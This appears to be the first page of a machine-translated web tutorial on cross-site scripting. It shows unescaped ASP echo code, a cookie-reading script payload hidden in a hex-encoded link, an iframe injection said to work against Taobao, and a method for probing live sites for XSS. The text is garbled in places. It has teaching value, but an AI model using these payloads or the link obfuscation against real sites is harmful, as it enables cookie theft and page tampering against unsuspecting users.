Students who have used ASP must have seen the code like this:
Hello,
Copy Code code as follows:
<%
Response.Write (Request.QueryString ("name"))
%>
If I pass in the value of name is:
<script>x=document.cookie;alert (x);</script>
[Ctrl + A All SELECT Note: If the need to introduce external JS need to refresh to perform]
This allows you to steal the user's cookies directly. So I can send a link address for someone else to point to:
Copy Code code as follows:
Http://www.xxx.com/reg.asp?name=<script>x=document.cookie;alert (x);</script>
Of course this does not have a bit of concealment, although the xxx.com in front of a few, but most people can identify the following JavaScript code, so I just need to convert the following JavaScript code to the URL of the 16, such as:
Copy Code code as follows:
Http://www.xxx.com/reg.asp?name=%3C%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B %61%6c%65%72%74%28%78%29%3b%3c%2f%73%63%72%69%70%74%3e
Do you still recognize the URL above? Unless you switch it out. (The conversion can use the Napkin tool, alas, too bad.) )
Root cause
1. No constraints on input, no encoding of output
2. There is no strict distinction between "data" and "code"
Example
Found that the famous Taobao also has such a loophole, we enter in the search box:
Copy Code code as follows:
"/><div style=" position:absolute;left:0px;top:0px; ><iframe src= "http://www.baidu.com" frameborder=0 width=1000 height=900/></div><a href= "
In this way, we have modified the original Taobao page, embedded in the following Baidu's homepage. Effect as shown:
Time to use
I try to find XSS vulnerabilities in various websites, Baidu, amazon.cn, youku.com, dangdang.com, and so on. As a result, I find XSS vulnerabilities very common! In fact, XSS is using the echo of a Web page, that is, to receive input from a user, and then to display the user's input on the page. Summarize a few places where vulnerabilities can occur:
Search engine
1, message board
2, error page
3, through the above types of pages to enter some special characters (including < >/"), such as: </?jjkk>, and then in the results page of the source code to search for the existence of the original: </?jjkk> if there is, congratulations, you found an XSS vulnerability.
Current 1/4 page
1234 Next read the full text